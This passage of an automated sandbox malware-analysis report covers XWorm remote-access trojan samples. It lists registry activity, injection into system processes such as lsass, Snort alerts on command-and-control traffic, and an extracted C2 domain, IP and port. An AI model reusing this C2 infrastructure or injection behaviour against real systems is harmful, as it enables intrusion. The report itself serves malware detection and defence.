                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A6E630 FindFirstFileExW,5_2_000002D8B0A6E630
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC64E630 FindFirstFileExW,6_2_00000225DC64E630
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AEE630 FindFirstFileExW,7_2_00000202C0AEE630
                      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000002A66130E630 FindFirstFileExW,8_2_000002A66130E630
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE26E630 FindFirstFileExW,9_2_000002BAAE26E630
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026A879CE630 FindFirstFileExW,10_2_0000026A879CE630
                      Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000179537AE630 FindFirstFileExW,11_2_00000179537AE630
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 4x nop then jmp 00007FFD9B88ED12h2_2_00007FFD9B88EB44
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 4x nop then jmp 00007FFD9B88FEE4h2_2_00007FFD9B88F869
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 4x nop then jmp 00007FFD9B88FEF5h2_2_00007FFD9B88F869
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 4x nop then jmp 00007FFD9B890AB4h2_2_00007FFD9B88BE28
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 4x nop then jmp 00007FFD9B890AB4h2_2_00007FFD9B88BE28

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.4:49731 -> 147.185.221.20:36125
                      Source: TrafficSnort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 147.185.221.20:36125 -> 192.168.2.4:49731
                      Source: TrafficSnort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49732 -> 147.185.221.20:36125
                      Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49732 -> 147.185.221.20:36125
                      Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 147.185.221.20:36125 -> 192.168.2.4:49732
                      Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 147.185.221.20:36125 -> 192.168.2.4:49731
                      Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49731 -> 147.185.221.20:36125
                      Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 147.185.221.20:36125 -> 192.168.2.4:49731
                      Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 147.185.221.20:36125
                      Source: Malware configuration extractorURLs: session-chief.gl.at.ply.gg
                      Source: global trafficTCP traffic: 147.185.221.20 ports 1,2,3,5,6,36125
                      Source: Yara matchFile source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.4:49731 -> 147.185.221.20:36125
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 147.185.221.20 147.185.221.20
                      Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                      Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: session-chief.gl.at.ply.gg
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: svchost.exe, 00000025.00000002.2953015111.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.1899628825.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.2951243071.0000026EF4C21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: lsass.exe, 00000007.00000000.1744351768.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                      Source: lsass.exe, 00000007.00000000.1744095896.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2962697239.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                      Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, x4host.exe.0.dr, x4usb.exe.2.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3F15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: svchost.exe, 00000025.00000000.1899628825.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.1899835829.0000026EF4C6A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                      Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: svchost.exe, 00000011.00000000.1809587946.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                      Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1743582596.0000021FE3D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: lsass.exe, 00000007.00000000.1744095896.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2962697239.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                      Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                      Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                      Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
                      Source: svchost.exe, 0000001A.00000000.1837012178.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3027964125.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com
                      Source: svchost.exe, 0000001A.00000000.1837012178.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3027964125.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com/
                      Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: svchost.exe, 00000023.00000002.3004729739.0000020D26029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1889283300.0000020D25FD3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1890717083.0000020D260D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3000838222.0000020D25FD3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
                      Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.1743582596.0000021FE4E45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000003.00000002.1782623387.0000021FFC1A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                      Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
                      Source: svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                      Source: svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com3J
